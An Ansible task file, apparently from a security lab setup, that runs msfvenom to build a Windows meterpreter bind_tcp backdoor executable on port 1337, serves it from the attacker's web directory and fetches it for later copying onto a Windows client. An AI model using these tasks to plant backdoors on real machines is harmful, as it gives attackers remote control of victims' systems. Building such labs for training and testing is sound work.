---
#
# Creates a simple backdoor executable using Metasploit in the Attacker's Web
# directory and also copies it locally (to later be copied to the Windows client)
#
- name: "Create a backdoor executable using Metasploit"
  command: "msfvenom --arch x86 --platform windows --format exe --out {{ exe_filename }} --payload windows/meterpreter/bind_tcp LPORT=1337"
  args:
    chdir: "{{ vhost_path }}"
    creates: "{{ vhost_path }}/{{ exe_filename }}"

# The malware is added to .gitignore so that it won't show up in the repo.
# Run this task (through attacker_playbook.yml) before the windows client playbook.
- name: "Fetch the backdoored executable (which will later be copied into the Windows client)"
  fetch:
    src: "{{ vhost_path }}/{{ exe_filename }}"
    dest: "{{ role_path }}/files/{{ exe_filename }}"
    flat: yes
